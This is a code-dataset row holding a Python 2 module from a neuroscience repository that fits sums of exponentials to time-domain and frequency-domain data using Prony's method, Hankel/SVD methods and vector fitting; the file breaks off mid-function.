repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
WillemWybo/SGF_formalism | source/functionFitter.py | 1 | 43613 | """
Author: Willem Wybo
Date: 18/08/2015
Place: BBP, Geneva
"""
import numpy as np
import numpy.polynomial.polynomial as npol
import scipy.linalg as la
import scipy.optimize as op
import scipy.integrate as integ
import matplotlib.pyplot as pl
from scipy.cluster.vq import kmeans2
from scipy.cluster.vq import kmeans
import copy
import math
import warnings
import itertools
import types
class Fitter(object):
def der(self, x, arr):
dx = x[1] - x[0]
diffarr = (arr[1:] - arr[0:-1]) / dx
return diffarr, x[0:-1] + dx/2
def derder(self, x, arr):
dx = x[1] - x[0]
diffarr, _ = self.der(x, arr)
diffdiffarr = (diffarr[1:] - diffarr[0:-1]) / dx
return diffdiffarr, x[1:-1]
def zerocrossing(self, x, arr):
arr = copy.copy(arr)
inds = np.where(np.diff(np.sign(arr)))[0]
return inds, x[inds]
def find_nearest(self, array, value):
idx = (np.abs(array-value)).argmin()
return array[idx], idx
class ExpFitter(Fitter):
def sumExp(self, x, a, c, flat=True):
if flat:
return (np.exp(x[:,None]*a[:,None].T).dot(c[:,None])).flatten().real
else:
return np.exp(x[:,None]*a[:,None].T).dot(c[:,None]).real
def PronyExpFit(self, deg, x, y):
'''
Construct a sum of exponentials fit to a given time-sequence y by
using prony's method
input:
[deg]: int, number of exponentials
[x]: numpy array, sequence of regularly spaced points at which y is evaluated
[y]: numpy array, sequence
output:
[a]: numpy array, exponential coefficient
[c]: numpy array, exponentail magnitudes
[rms]: float, root mean square error of the data
'''
# stepsize
h = x[1] - x[0]
#Build matrix
A = la.hankel(y[:-deg],y[-deg-1:])
a = -A[:,:deg]
b = A[:,deg]
#Solve it
s = la.lstsq(a,b)[0]
#Solve polynomial
p = np.flipud(np.hstack((s,1)))
u = np.roots(p)
#Only keep roots in unit circle
inds = np.where(np.logical_and((np.abs(u) < 1.), \
np.logical_not(np.logical_and(np.imag(u) == 0., np.real(u) <= 0.))))[0]
u = u[inds]
#Calc exponential factors
a = np.log(u)/h
#Build power matrix
A = np.power((np.ones((len(y),1))*u[:,None].T),np.arange(len(y))[:,None]*np.ones((1,len(inds))))
#solve it
f = la.lstsq(A,y)[0]
#calc amplitudes
c = f/np.exp(a*x[0])
#build x, approx and calc rms
approx = self.sumExp(x, a, c).real
rms = np.sqrt(((approx-y)**2).sum() / len(y))
return a, c, rms
def construct_Hankel_matrices(self, y):
ind0 = int(len(y)/2)
# original and shifted hankel matrix
H0 = la.hankel(y[0:ind0], y[ind0-1:2*ind0-1])
H1 = la.hankel(y[1:ind0+1], y[ind0:2*ind0])
return H0, H1
# def Z_McE_ExpFit(self, x, y, deg=2):
# # construct the Hankel matrices
# H0, H1 = self.construct_Hankel_matrices(y)
# # compute the singular value decomposition
# U, s, Vh = la.svd(H0)
# U_ = U[:, 0:deg]
# Vh_ = Vh[0:deg, :]
# s_ = s[0:deg]
# # compute system matrix
# F0 = np.diag(1./np.sqrt(s_)).dot(U_.T)
# F1 = Vh_.T.dot(np.diag(1./np.sqrt(s_)))
# A = F0.dot(H1.dot(F1))
# # find eigenvalues of system matrix
# u, v = la.eig(A)
# # system time-scales (inverse)
# alphas = np.log(u) / dx
# return alphas
def fitExp_Z_McE(self, x, y, rtol=1e-2, maxdeg=10):
deg = 1; rms = 1.
# stepsize
dx = x[1] - x[0]
# construct the Hankel matrices
H0, H1 = self.construct_Hankel_matrices(y)
# compute the singular value decomposition
U, s, Vh = la.svd(H0)
# loop over increasing number of exponentials
while rms > rtol and deg < maxdeg:
U_ = U[:, 0:deg]
Vh_ = Vh[0:deg, :]
s_ = s[0:deg]
# compute system matrix
F0 = np.diag(1./np.sqrt(s_)).dot(U_.T)
F1 = Vh_.T.dot(np.diag(1./np.sqrt(s_)))
A = F0.dot(H1.dot(F1))
# find eigenvalues of system matrix
u, v = la.eig(A)
# system time-scales (inverse)
alphas = np.log(u.real) / dx
# solve weights
A = np.exp(x[:,None] * alphas[None, :] * dx)
gammas = la.lstsq(A,y)[0]
# compute rmse
approx = self.sumExp(x, alphas, gammas)
rms = np.sqrt(((approx-y)**2).sum() / len(y))
# increase degree
deg += 1
return alphas, gammas, rms
def reduceSeries(self, a, c, x, y, rtol=1e-2):
'''
Reduces the number of exponential terms in a series, till a given tolerance
is reached
input:
[a]: numpy array of exponential timescales
[c]: numpy array of exponential magnitudes
[x]: numpy array of x-values at which the function is evaluated
[y]: numpy array of function values
[rtol]: float, relative tolerance given the largest function value
output:
[alpha]: exponential coefficients
[gamma]: magnitudes
[rms]: float, root mean square error
'''
k = 1; rms = 2*rtol
while rms > rtol and k <= len(a):
sortind = np.argsort(np.abs(c))[::-1]
alpha = a[sortind][0:k]
gamma = c[sortind][0:k]
approx = self.sumExp(x, alpha, gamma).real
rms = np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
k += 1
return alpha, gamma, rms
def fitExp(self, x, y, deg=30, rtol=1e-2, surface=False, A=None):
a, c, rms = self.PronyExpFit(deg, x, y)
alpha, gamma, rms = self.reduceSeries(a, c, x, y, rtol=rtol)
if surface:
dx = x[1] - x[0]
if A == None:
A = dx * np.sum(y)
Afit = np.sum(gamma * (np.exp(alpha*x[-1]) - np.exp(alpha*x[0])) / alpha)
gamma = gamma * A / Afit
approx = self.sumExp(x, alpha, gamma).real
rms = np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
return alpha, gamma, rms
class fExpFitter(Fitter):
def sumFExp(self, s, alphas, gammas):
return np.sum(self.fexps(s, alphas, gammas), 0)
def fexps(self, s, alphas, gammas):
return gammas[:,None] / (alphas[:,None] + s[None,:])
def trialFunFit(self, s, arr, alphas, pairs=None):
# construct matrix for extended fitting problem
A = np.concatenate((1. / (s[:,None] + alphas[None,:]), \
arr[:,None] / (s[:,None] + alphas[None,:])), axis=1)
# find auxiliary residues
c = la.lstsq(A, arr)[0][-len(alphas):]
# find zeros of fitted auxiliary function
H = np.diag(alphas) - np.dot(np.ones((len(alphas),1), dtype=complex), c[None,:])
alphanew = np.linalg.eig(H)[0]
# find real residues
Anew = 1. / (s[:,None] + alphanew[None,:])
cnew = la.lstsq(Anew, arr)[0]
return alphanew, cnew, None
def trialFunFit_constrained(self, s, arr, alphas, pairs, zerostart=False):
deg = len(alphas)
carr = np.concatenate((arr.real, arr.imag))
# construct matrix for extended fitting problem
A = np.concatenate((1. / (s[:,None] + alphas[None,:]), \
arr[:,None] / (s[:,None] + alphas[None,:])), axis=1)
# implement the constraint
pairsnew = np.concatenate((pairs, pairs))
for i, p in enumerate(pairsnew):
if p:
x1 = A[:,i] + A[:,i+1]
x2 = 1j * (A[:,i] - A[:,i+1])
A[:,i] = x1
A[:,i+1] = x2
A = np.concatenate((A.real, A.imag), axis=0)
# find auxiliary residues
c = la.lstsq(A, carr)[0][-len(alphas):]
# find zeros of fitted auxiliary function
a = np.diag(alphas)
b = np.ones(deg)
# implement similarity transform
for i, p in enumerate(pairs):
if p:
a[i:i+2, i:i+2] = np.array([[alphas[i].real, alphas[i].imag], \
[-alphas[i].imag, alphas[i].real]])
b[i:i+2] = np.array([2,0])
H = a.real - np.dot(b[:,None], c[None,:])
alphanew = np.linalg.eig(H)[0]
inds = np.argsort(alphanew)
alphanew = alphanew[inds]
# indicates where pairs of complex conjugate poles occur
auxarr = np.abs((np.abs(alphanew[:-1]) - np.abs(alphanew[1:])) / np.abs(alphanew[:-1]))
auxarr2 = np.abs(alphas.imag) > 1e-15
pairs = np.logical_and(np.concatenate((auxarr < 1e-15, np.zeros(1, dtype=bool))), auxarr2)
# find residues
Anew = 1. / (s[:,None] + alphanew[None,:])
for i, p in enumerate(pairs):
if p:
x1 = Anew[:,i] + Anew[:,i+1]
x2 = 1j * (Anew[:,i] - Anew[:,i+1])
Anew[:,i] = x1
Anew[:,i+1] = x2
Anew = np.concatenate((Anew.real, Anew.imag), axis=0)
if zerostart:
# enforce K(t=0)=0 constraint
row1 = np.ones(2*deg)
for i, p in enumerate(pairs):
if p:
row1[i+1] = 0
Anew = np.concatenate((np.ones((1, deg), dtype=complex), Anew), axis=0)
carr = np.concatenate((np.zeros(1, dtype=complex), carr))
cnew = la.lstsq(Anew, carr)[0]
cnew = np.array(cnew, dtype=complex)
# recast cnew to complex values
for i, p in enumerate(pairs):
if p:
cnew[i:i+2] = np.array([cnew[i] + 1j * cnew[i+1], cnew[i] - 1j * cnew[i+1]])
return alphanew, cnew, pairs
def fit_residues(self, s, arr, alphas, pairs):
carr = np.concatenate((arr.real, arr.imag))
A = 1. / (s[:,None] + alphas[None,:])
for i, p in enumerate(pairs):
if p:
x1 = A[:,i] + A[:,i+1]
x2 = 1j * (A[:,i] - A[:,i+1])
A[:,i] = x1
A[:,i+1] = x2
A = np.concatenate((A.real, A.imag), axis=0)
cnew = la.lstsq(A, carr)[0]
cnew = np.array(cnew, dtype=complex)
# recast cnew to complex values
for i, p in enumerate(pairs):
if p:
cnew[i:i+2] = np.array([cnew[i] + 1j * cnew[i+1], cnew[i] - 1j * cnew[i+1]])
return cnew
def trialFunFit_constrained_2d(self, s, arr2d, alphas, pairs):
print '>>> multifun fit test v2 <<<'
deg = len(alphas)
# construct f array
arr1d = np.array([], dtype=complex)
for ind, arr in enumerate(arr2d):
arr1d = np.concatenate((arr1d, arr))
# construct matrix A
ns = len(s)
ncols = (len(arr2d) + 1) * deg
nrows = len(arr1d)
A = np.zeros((nrows, ncols), dtype=complex)
for ind, fis in enumerate(arr1d):
indA = int(ind/ns)
A[ind,deg*indA:deg*(indA+1)] = 1./(s[ind%ns] + alphas)
# try:
# A[ind,deg*indA:deg*(indA+1)] = 1./(s[ind%ns] + alphas)
# except ValueError:
# print indA
# print deg*indA
# print deg*(indA+1)
# print ncols
A[ind,-deg:] = -fis / (s[ind%ns] + alphas)
# implement the constraint
for j in range(len(arr2d) + 1):
for i, p in enumerate(pairs):
if p:
x1 = A[:,j*deg+i] + A[:,j*deg+i+1]
x2 = 1j * (A[:,j*deg+i] - A[:,j*deg+i+1])
A[:,j*deg+i] = x1
A[:,j*deg+i+1] = x2
A = np.concatenate((A.real, A.imag), axis=0)
arr1d = np.concatenate((arr1d.real, arr1d.imag))
# find auxiliary residues
c = la.lstsq(A, arr1d)[0][-len(alphas):]
print 'cnew: ', c
# find zeros of fitted auxiliary function
a = np.diag(alphas)
b = np.ones(deg)
# implement similarity transform
for i, p in enumerate(pairs):
if p:
a[i:i+2, i:i+2] = np.array([[alphas[i].real, alphas[i].imag], \
[-alphas[i].imag, alphas[i].real]])
b[i:i+2] = np.array([2,0])
# compute zeros of sum sigmafit
H = a.real - np.dot(b[:,None], c[None,:])
print 'H: ', H
alphanew = np.linalg.eig(H)[0]
print 'alphanew: ', alphanew
inds = np.argsort(alphanew)
alphanew = alphanew[inds]
# indicates where pairs of complex conjugate poles occur
auxarr = np.abs((np.abs(alphanew[:-1]) - np.abs(alphanew[1:])) / np.abs(alphanew[:-1]))
auxarr2 = np.abs(alphanew.imag) > 1e-15 # np.abs(alphas.imag) > 1e-15
pairs = np.logical_and(np.concatenate((auxarr < 1e-15, np.zeros(1, dtype=bool))), auxarr2)
# find residues
# compute matrix for residue calculation
Anew = 1. / (s[:,None] + alphanew[None,:])
for i, p in enumerate(pairs):
if p:
x1 = Anew[:,i] + Anew[:,i+1]
x2 = 1j * (Anew[:,i] - Anew[:,i+1])
Anew[:,i] = x1
Anew[:,i+1] = x2
Anew = np.concatenate((Anew.real, Anew.imag), axis=0)
# compute residues
c2dnew = np.zeros((arr2d.shape[0], deg), dtype=complex)
for ind, arr in enumerate(arr2d):
carr = np.concatenate((arr.real, arr.imag))
cnew = la.lstsq(Anew, carr)[0]
cnew = np.array(cnew, dtype=complex)
# recast cnew to complex values
for i, p in enumerate(pairs):
if p:
cnew[i:i+2] = np.array([cnew[i] + 1j * cnew[i+1], cnew[i] - 1j * cnew[i+1]])
c2dnew[ind,:] = cnew
print 'cnew: ', c2dnew
return alphanew, c2dnew, pairs
def reduceSeries(self, s, y, a, c, pairs=None, rtol=1e-2, pprint=True):
'''
reduce the series of exponentials after the fitting
'''
k = 1; rms = 1.
# ensure stability of approximation
inds = np.where(a.real > 0.)[0]
a = a[inds]; c = c[inds];
if pairs != None: pairs = pairs[inds]
# construct indices for ranking the exponentials
pairs_alltrue = copy.copy(pairs)
for i,p in enumerate(pairs):
if p: pairs_alltrue[i+1] = True
magnitudes = np.zeros(a.shape)
for i in range(len(pairs_alltrue)):
if pairs_alltrue[i]:
c_ = c[i].real; c__ = c[i].real
a_ = a[i].real; a__ = a[i].real
magnitudes[i] = (c_*a_ + c__*a__) / (a_**2 + a__**2)
else:
magnitudes[i] = c[i].real / a[i].real
sortind = np.argsort(np.abs(magnitudes))[::-1]
anew = copy.copy(a[sortind])
alphas = anew
cnew = copy.copy(c[sortind])
gammas = cnew
# look for pairs to be sure they are correct
auxarr = np.abs((np.abs(alphas[:-1]) - np.abs(alphas[1:])) / np.abs(alphas[:-1]))
auxarr2 = np.abs(alphas.imag) > 1e-15
pairs = np.logical_and(np.concatenate((auxarr < 1e-15, np.zeros(1, dtype=bool))), auxarr2)
npairs = copy.copy(pairs)
approx = self.sumFExp(s, alphas, gammas)
while rms > rtol and k < len(a)+1:
if (pairs != None) and pairs[k-1]:
k += 1
alphas = anew[0:k]
gammas = cnew[0:k]
auxarr = np.abs((np.abs(alphas[:-1]) - np.abs(alphas[1:])) / np.abs(alphas[:-1]))
auxarr2 = np.abs(alphas.imag) > 1e-15
npairs = np.logical_and(np.concatenate((auxarr < 1e-15, np.zeros(1, dtype=bool))), auxarr2)
approx = self.sumFExp(s, alphas, gammas)
rms = np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
k += 1
if pprint:
pairinds = copy.copy(npairs)
inds = np.where(npairs)[0]
for i in inds:
pairinds[i+1] = True
inds = np.where(np.logical_not(pairinds))[0]
if len(inds) > 0:
if np.max(np.abs(alphas[inds].imag)) > 1e-6:
print '!!! Warning: invalid pairs !!!'
print 'original alphas: ', anew
print 'original gammas: ', cnew
print 'original pairs: ', pairs
print 'new alphas: ', alphas
print 'new gammas: ', gammas
print 'new pairs: ', npairs
return alphas, gammas, rms, approx, npairs
def _find_start_nodes(self, s, deg, realpoles, initpoles):
if initpoles == 'lin':
trialpoles = np.linspace(s[int(len(s)/2.)+1].imag, s[-1].imag, deg)
elif initpoles == 'log10':
trialpoles = np.logspace(1, np.log10(s[-1].imag), num=deg, base=10)
elif initpoles == 'log':
trialpoles = np.logspace(1, np.log(s[-1].imag), num=deg, base=math.e)
elif initpoles == 'random':
trialpoles = s[-1].imag * np.random.rand(deg)
else:
raise Exception('initpoles invalid')
if realpoles:
pairs = np.zeros(trialpoles.shape, dtype=bool)
else:
trialpoles = np.array([[tp + 1j*tp, tp - 1j*tp] for tp in trialpoles]).flatten()
pairs = np.array([[True, False] for _ in range(deg)]).flatten()
return trialpoles, pairs
def _run_fit(self, s, y, trialpoles, pairs, rtol, maxiter, constrained, zerostart, pole_flip=True, pprint=True):
'''
performs iterations of the actual fitting process
'''
k = 0; rms = rtol+1.
l = 0; m = 0
alist = []; clist = []; rmslist = []; pairslist = []
trialpoles_orig = copy.copy(trialpoles)
pairs_orig = copy.copy(pairs)
if constrained:
while rms > rtol and k < maxiter:
a, c, pairs = self.trialFunFit_constrained(s, y, trialpoles, pairs, zerostart=zerostart)
approx = self.sumFExp(s, a, c)
rms = np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
# if unstable poles, make sure to run again
# if np.min(a) < 0.:
# rms = rtol + 1.
# if m < 10.:
# if pole_flip:
ind = np.where(a < 0.)[0] # where poles are unstable
if len(ind) > 0:
a[ind] *= -1.
c = self.fit_residues(s, y, a, pairs)
approx = self.sumFExp(s, a, c)
rms = np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
# if rms < rtol:
# alist.append(copy.deepcopy(a)); clist.append(copy.deepcopy(c)); rmslist.append(rms); pairslist.append(pairs)
# else:
# ind = np.where(a > 0.)[0] # where poles are stable
# newpole, newpair = self._find_start_nodes(s, len(a)-len(ind), True, 'random')
# trialpoles = np.concatenate((a[ind], newpole))
# pairs = np.concatenate((pairs[ind], newpair))
# else:
# trialpoles, pairs = self._find_start_nodes(s, len(trialpoles_orig), True, 'random')
# m = 0
# l += 1; m += 1
# else:
alist.append(copy.deepcopy(a)); clist.append(copy.deepcopy(c)); rmslist.append(rms); pairslist.append(pairs)
trialpoles = copy.copy(a)
k += 1
if pprint and l > 5:
print 'Often found unstable poles (' + str(l) + ' times)'
return alist, clist, rmslist, pairslist
else:
while rms > rtol and k < maxiter:
a, c,_ = self.trialFunFit(s, y, trialpoles, zerostart)
approx = self.sumFExp(s, a, c)
rms = np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
trialpoles = a
k += 1
return alist, clist, rmslist, None
def _run_fit_vector(self, s, ys, trialpoles, pairs, rtol, maxiter):
# eps = 2.
# k = 0; rms = 1.
# rms_ = rms
# alist = []; clist = []; rmslist = []; pairslist = []
# while rms > rtol and k < maxiter:
# a, c2d, pairs = self.trialFunFit_constrained_2d(s, ys, trialpoles, pairs)
# rms = 0.
# for ind, y in enumerate(ys):
# approx = self.sumFExp(s, a, c2d[ind])
# rms += np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
# alist.append(copy.deepcopy(a)); clist.append(copy.deepcopy(c2d)); rmslist.append(rms); pairslist.append(pairs)
# # randomize poles a bit
# skip = False
# tp = copy.deepcopy(a)
# if (rms_ - rms) / rms_ < eps:
# for i, p in enumerate(pairs):
# if not skip:
# if p:
# x1 = 0.1 * tp[i].real; x2 = 0.1 * np.abs(tp[i].imag)
# r1 = x1 * (2. * np.random.rand() - 1); r2 = x2 * (2. * np.random.rand() - 1)
# tp[i:i+2] = np.array([tp[i] + r1 + 1j*r2, tp[i+1] + r1 - 1j*r2])
# skip = True
# else:
# x = 0.1 * tp[i]
# r = x * (2. * np.random.rand() - 1)
# tp[i] += r
# skip = False
# trialpoles = tp
# k += 1
# rms_ = rms
eps = 2.
k = 0; rms = 1.
rms_ = rms
alist = []; clist = []; rmslist = []; pairslist = []
while rms > rtol and k < maxiter:
a2d = np.zeros((len(ys), len(trialpoles)), dtype=complex)
c2d = np.zeros((len(ys), len(trialpoles)), dtype=complex)
pairs2d = np.zeros((len(ys), len(trialpoles)), dtype=bool)
for ind, y in enumerate(ys):
a2d[ind], c2d[ind], pairs2d[ind] = self.trialFunFit_constrained(s, y, trialpoles, pairs)
# put complex conjugates with positive part first
for i, p in enumerate(pairs2d[ind]):
if p:
if a2d[ind,i] < 0:
a2d[ind,i] = a2d[ind,i].real - 1j * a2d[ind,i].imag
a2d[ind,i+1] = a2d[ind,i+1].real - 1j * a2d[ind,i+1].imag
c2d[ind,i] = c2d[ind,i].real - 1j * c2d[ind,i].imag
c2d[ind,i+1] = c2d[ind,i+1].real - 1j * c2d[ind,i+1].imag
a, pairs = self._Kmeans(a2d, pairs2d)
c2d = np.zeros((len(ys), len(a)), dtype=complex)
for ind, y in enumerate(ys):
c2d[ind] = self.fit_residues(s, y, a, pairs)
approx = self.sumFExp(s, a, c2d[ind])
rms += np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
alist.append(copy.deepcopy(a)); clist.append(copy.deepcopy(c2d)); rmslist.append(rms); pairslist.append(pairs)
# randomize poles a bit
skip = False
tp = copy.deepcopy(a)
if (rms_ - rms) / rms_ < eps:
for i, p in enumerate(pairs):
if not skip:
if p:
x1 = 0.1 * tp[i].real; x2 = 0.1 * np.abs(tp[i].imag)
r1 = x1 * (2. * np.random.rand() - 1); r2 = x2 * (2. * np.random.rand() - 1)
tp[i:i+2] = np.array([tp[i] + r1 + 1j*r2, tp[i+1] + r1 - 1j*r2])
skip = True
else:
x = 0.1 * tp[i]
r = x * (2. * np.random.rand() - 1)
tp[i] += r
skip = False
trialpoles = tp
k += 1
return alist, clist, rmslist, pairslist
def _Kmeans(self, a2d, pairs2d): # do the kmeans algorithm to make sure all nodes are the same
a1d = np.array([], dtype=complex)
for i, a in enumerate(a2d):
# determine the coefficients not to take into account in the algorithm
paux = np.concatenate((np.array([False]), pairs2d[i,:-1]))
inds = np.where(np.logical_not(paux))[0]
a1d = np.concatenate((a1d,a[inds]))
adata = np.concatenate((a1d.real[:,None], a1d.imag[:,None]), 1)
astart = np.concatenate((a2d[-1].real[inds][:,None], a2d[-1].imag[inds][:,None]), 1)
a = kmeans(adata, astart)[0]
# check for complex conjugates
anew = []; pairsnew = []
for alpha in a:
if np.abs(alpha[1]) > 1e-9:
anew.append(alpha[0] + 1j*alpha[1])
anew.append(alpha[0] - 1j*alpha[1])
pairsnew.append(True)
pairsnew.append(False)
else:
anew.append(alpha[0] + 1j*0.)
pairsnew.append(False)
# a = a[:,0] + 1j* a[:,1]
# look for pairs to be sure they are correct
# auxarr = np.abs((np.abs(a[:-1]) - np.abs(a[1:])) / np.abs(a[:-1]))
# auxarr2 = np.abs(a.imag) > 1e-15
# pairs = np.logical_and(np.concatenate((auxarr < 1e-15, np.zeros(1, dtype=bool))), auxarr2)
return np.array(anew), np.array(pairsnew)
def reduceNumExp(self, s, y, a, c, pairs, lim=0.1, pprint=True, pplot=True):
'''
pools the short timescale exponentials
'''
# find inds of exponentials that have to be taken together
inds = np.where(np.abs(a.real) > (1e3 / lim))[0]
# the other indices stay the same
inds_no = np.where(np.abs(a.real) <= (1e3 / lim))[0]
anew = a[inds_no]; cnew = c[inds_no]; pairsnew = pairs[inds_no]
if len(inds) > 1:
amin = np.min(a[inds])
EF = ExpFitter()
if pplot == True:
import matplotlib.pyplot as pl
y_f_full = self.sumFExp(s, a, c)
y_f_part = self.sumFExp(s, a[inds], c[inds])
pl.figure('reduceNumExp problem')
pl.plot(s.imag, y_f_full.real, 'r')
pl.plot(s.imag, y_f_part.real, 'b')
pl.plot(s.imag, y_f_full.imag, 'r--')
pl.plot(s.imag, y_f_part.imag, 'b--')
pl.show()
# multiple step approach
t = np.linspace(0., 5./amin.real, 1000.)
y_t = EF.sumExp(t, -a[inds], c[inds])
y_t_full = EF.sumExp(t, -a, c)
A_t = -np.sum(c[inds] * (np.exp(-a[inds]*t[-1]) - np.exp(-a[inds]*t[0])) / a[inds])
y_t_lim = EF.sumExp(np.array([lim*1e-3]), -a[inds], c[inds])
y_t_lim_full = EF.sumExp(np.array([lim*1e-3]), -a, c)
#~ print 'full sum at 1ms: ', y_t_lim_full
#~ print 'partial sum at 1ms: ', y_t_lim
#~ print 'max full sum: ', np.max(y_t_full[1:])
# fit first outside of first timestep if necessary
if amin.real < (2e4 / lim) and np.abs(y_t_lim_full - y_t_lim) > 0.001 * np.max(y_t_full[1:]):
t_out = np.linspace(lim*1e-3, 5./amin.real, 1000.)
y_out = EF.sumExp(t_out, -a[inds], c[inds])
A_out = -np.sum(c[inds] * (np.exp(-a[inds]*t_out[-1]) - np.exp(-a[inds]*t_out[0])) / a[inds])
try:
# if the maximum of the to be grouped exponentials is past lim,
# we use two exponentials, otherwise one
#~ else:
A, C, _ = EF.fitExp(t_out, y_out, deg=1, rtol=0.0001, surface=True, A=A_out)
A = -A.real; C = C.real
Ptemp = [False]
except ValueError:
A = np.array([amin.real])
C = A_out / ((np.exp(-A*t_out[-1]) - np.exp(-A*t_out[0])) / A)
Ptemp = [False]
# check if we need to fit inside first timestep
t_in = np.linspace(0., lim*1e-3, 100)
y_in = EF.sumExp(t_in, -a[inds], c[inds]) - EF.sumExp(t_in, -A, C)
A_in_full = -np.sum(c[inds] * (np.exp(-a[inds]*t_in[-1]) - np.exp(-a[inds]*t_in[0])) / a[inds])
A_in = -np.sum(C * (np.exp(-A*t_in[-1]) - np.exp(-A*t_in[0])) / A)
if np.abs(A_in - A_in_full) < 0.01 * np.abs(A_in_full):
# we don't need to fit an extra exponential,
# but just rescale surfaces a bit
A_tot = np.sum(c[inds] / a[inds])
A_part = np.sum(C / A)
C = C * A_tot / A_part
P = np.array(Ptemp, dtype=bool)
else:
# we need to fit an extra exponential
t = np.linspace(0., 3./amin.real, 1000.)
A_t = np.sum(c[inds] / a[inds])
A_exp1 = np.sum(C / A)
A2 = np.array([1e4 / lim], dtype=complex)
C2 = (A_t-A_exp1) * A2
P = np.array(Ptemp + [False], dtype=bool)
A = np.concatenate((A, A2))
C = np.concatenate((C, C2))
else:
# we can just fit inside the first timestep
# construct new exponential naively
A = np.array([amin.real], dtype=complex)
C = np.sum(c[inds] / a[inds]) * A
P = np.array([False], dtype=bool)
# concatenate the arrays
anew = np.concatenate((anew, A))
cnew = np.concatenate((cnew, C))
pairsnew = np.concatenate((pairsnew, P))
if pprint or pplot:
t = np.linspace(0.,0.050,100000)
A_original = - np.sum(c * (np.exp(-a*t[-1]) - np.exp(-a*t[0])) / a)
A_new = - np.sum(cnew * (np.exp(-anew*t[-1]) - np.exp(-anew*t[0])) / anew)
if np.abs(A_original - A_new) > 1e-12 or np.isnan(A_new.real):
print '!!! Warning: surfaces under kernels not equal !!!'
print 'oringal surface: ', A_original
print 'new surface: ', A_new
print 'all a\'s: ', a
print 'all gamma\'s: ', c
print 'all pairs: ', pairs
print 'tbg a\'s: ', a[inds]
print 'tbg gamma\'s: ', c[inds]
print 'tbg pairs: ', pairs[inds]
print 'ntbg a\'s: ', a[inds_no]
print 'ntbg gamma\'s: ', c[inds_no]
print 'ntbg pairs: ', pairs[inds_no]
print 'new a\'s: ', anew
print 'new c\'s: ', cnew
print 'new pairss: ', pairsnew
if pplot and (np.abs(A_original - A_new) > 1e-12 or np.isnan(A_new.real)):
#~ if pplot:
t = np.linspace(0.,0.050,100000)
dt = t[1] - t[0]
ef = ExpFitter()
se_ = ef.sumExp(t, -a[inds], c[inds])
e_ = ef.sumExp(t, -A, C)
se = ef.sumExp(t, -a, c)
e = ef.sumExp(t, -anew, cnew)
print 'integral original reduced: ', - np.sum(c[inds] * (np.exp(-a[inds]*t[-1]) - np.exp(-a[inds]*t[0])) / a[inds])
print 'integral fit reduced: ', - np.sum(C * (np.exp(-A*t[-1]) - np.exp(-A*t[0])) / A)
print 'final a\'s :', anew
print 'new a\'s :', A
import matplotlib.pyplot as pl
pl.figure('reduce_exp problem')
pl.plot(t*1000, se, 'r', label='original kernel')
pl.plot(t*1000, e, 'b', label='new kernel')
pl.plot(t*1000, se_, 'r--', label='exps to be reduced')
pl.plot(t*1000, e_, 'b--', label='to be reduced exp')
pl.legend(loc=0)
pl.show()
# new approximation and rmse
approx = self.sumFExp(s, anew, cnew)
rms = np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
return anew, cnew, rms, approx, pairsnew
def fitFExp_increment(self, s, y, rtol=1e-2, maxiter=20, maxiter_step=3, realpoles=True, constrained=True, zerostart=False, pprint=True):
# find the start nodes
trialpoles, pairs = self._find_start_nodes(s, 1, realpoles, 'log10')
for k in range(maxiter):
alist, clist, rmslist, pairslist \
= self._run_fit(s, copy.copy(y), trialpoles, pairs, rtol, maxiter_step,
constrained, zerostart, pole_flip=True, pprint=pprint)
indmin = np.argmin(np.array(rmslist))
alpha = alist[indmin]; gamma = clist[indmin]; rms = rmslist[indmin]; pairs = pairslist[indmin]
if rms < rtol:
break
else:
if realpoles:
alphanew = [s[-1].imag * np.random.rand()]
pairsnew = [False]
else:
areal = s[-1].imag * np.random.rand()
aimag = s[-1].imag * np.random.rand()
alphanew = [areal + 1j*aimag, areal - 1j*aimag]
pairsnew = [True, False]
trialpoles = np.array(alpha.tolist() + alphanew)
# print trialpoles
pairs = np.array(pairs.tolist() + pairsnew)
rmsfinal = rms
if pprint and rmsfinal > rtol:
print 'Target accuracy was not reached'
return alpha, gamma, pairs, rmsfinal
def fitFExp(self, s, y, deg=20, rtol=1e-2, maxiter=5, lim=None, realpoles=True, initpoles='lin',
zerostart=False, constrained=True, reduce_numexp=False):
'''
Fits a function in fourrierspace by a series of fourrier transformed exponentials.
input:
-args
[s]: numpy array of frequencies (imaginary) at which value function is evaluated
[y]: numpy array of complex function values
-kwargs
[deg]: int, number of exponential terms used (real number is dubbeled if realpoles=False)
[rtol]: float, relative toleranse after which iterations stop
[maxiter]: int, maximum number of iterations
[lim]: float, smallest timescale to take into account [ms], if not None, the algorithm
fits the slowest timescale first, then the next slowest, etc. !!Use only for
decaying transfer functions!!
[realpoles]: boolean, use real starting poles if true, use complex conjugate poles if
false
[initpoles]: 'lin' for linearly spaced initial poles, 'log10' and 'log' for
logarithmically spaced poles
[zerostart]: boolean, constrain the function to be 0 at t=0 if true
[constrained]: fix the poles to be complex conjugate pairs
[reduce_numexp]: boolean, pool short time scale exponentials together if true
output:
[alpha]: numpy array of (complex) timescales of exponentials
[gamma]: numpy array of complex magnitudes of exponentials
[pairs]: boolean array that indicates True at every index where a complex
conjugate pair occurs
[rms]: float, root mean square error
'''
trialpoles, pairs = self._find_start_nodes(s, deg, realpoles, initpoles)
if lim != None:
a_s = []; c_s = []; pair_s = []
y_decr = copy.copy(y)
deg_decr = deg
keep_going = True
count = 0
while keep_going:
alist, clist, rmslist, pairslist = self._run_fit(s, y_decr, trialpoles, pairs, rtol, maxiter, constrained, zerostart)
indmin = np.argmin(np.array(rmslist))
anew, cnew, rmsnew, approx, pairsnew = self.reduceSeries(s, y_decr, alist[indmin], clist[indmin], pairs=pairslist[indmin], rtol=rtol)
if count == 0:
# save parameters for later purposes
asave = copy.copy(anew)
csave = copy.copy(cnew)
